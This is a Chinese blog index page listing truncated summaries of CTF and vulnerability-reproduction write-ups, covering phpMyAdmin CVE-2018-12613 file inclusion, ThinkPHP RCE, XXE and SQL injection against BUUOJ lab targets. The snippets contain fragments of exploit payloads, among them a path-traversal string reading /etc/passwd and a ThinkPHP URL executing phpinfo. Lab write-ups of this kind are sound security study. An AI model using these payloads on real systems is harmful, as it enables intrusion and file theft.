摘要: (CVE-2018-12613) 环境搭建 github传送门 BUU传送门 poc ?target=db_sql.php%253f/../../../../../../../../etc/passwd exp 这边利用包含session文件来获取 首先在SQL处执行 select '<?php p 阅读全文
posted @ 2020-12-07 20:38 WakeUpp 阅读(242) 评论(0) 推荐(0) 编辑
摘要: [ThinkPHP]2-Rce 复现 环境搭建 github传送门 BUU传送门 POC 老懒狗选择buu http://node3.buuoj.cn:26104/ poc http://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()% 阅读全文
posted @ 2020-12-07 16:21 WakeUpp 阅读(223) 评论(0) 推荐(0) 编辑
摘要: [ThinkPHP]5.0.23-Rce 环境搭建 github传送门 BUU传送门 POC 老懒狗选择直接buu,链接 http://node3.buuoj.cn:27512/ 直接用poc打一下: POST /index.php?s=captcha HTTP/1.1 Host: node3.bu 阅读全文
posted @ 2020-12-07 14:58 WakeUpp 阅读(1941) 评论(0) 推荐(0) 编辑
摘要: 环境搭建 环境搭建 Github传送门 BUU传送门 菜鸡懒得动手直接上buu一键搭建环境 http://node3.buuoj.cn:28078/ POC 首页已经提示thinkphp5了,笔者推荐一款比较好用的谷歌插件Wappalyzer 直接分析出使用了php7.2.31(但是不懂为啥没分析出 阅读全文
posted @ 2020-12-07 00:00 WakeUpp 阅读(254) 评论(0) 推荐(0) 编辑
摘要: [BJDCTF 2nd]xss之光 御剑 看了一下url,输入啥都不对。掏出御剑直接扫,扫出一个.git GitHack安排 得到: <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 原生类反序列化 参考 构造payload 阅读全文
posted @ 2020-11-27 14:57 WakeUpp 阅读(142) 评论(0) 推荐(0) 编辑
摘要: [BJDCTF2020]EasySearch 御剑扫一波 扫到一个index.php.swp <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01 阅读全文
posted @ 2020-11-27 14:12 WakeUpp 阅读(232) 评论(0) 推荐(1) 编辑
摘要: PHP入门 php的四种不同的风格 <?php 代码 ?> 官方推荐风格 <? 代码 ?> 短标记风格,需配置文件php.ini中开启short+open_tag <% 代码 %> ASP风格,需配置文件php.ini中开启asp_tags <script language=”php”> 代码 </ 阅读全文
posted @ 2020-11-18 13:17 WakeUpp 阅读(145) 评论(0) 推荐(0) 编辑
摘要: [CISCN2019 华北赛区 Day1 Web2]ikun shopping 要买到lv6,然而当前页面上没有lv6,爆破页面来搞事情。 import requests url="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/ 阅读全文
posted @ 2020-11-15 20:31 WakeUpp 阅读(131) 评论(0) 推荐(0) 编辑
摘要: [NCTF2019]True XML cookbook 爆破 抓包爆破,想直接爆出密码。 然鹅我天真了。 XXE漏洞 这里存在XXE漏洞,利用脚本直接打: 构造: <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY fi 阅读全文
posted @ 2020-11-15 17:37 WakeUpp 阅读(978) 评论(0) 推荐(0) 编辑
摘要: [极客大挑战 2019]FinalSQL 先骂出题人 出题人是真的狗,废话不多说先放最后爆破的结果: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.t 阅读全文
posted @ 2020-11-15 14:39 WakeUpp 阅读(475) 评论(0) 推荐(0) 编辑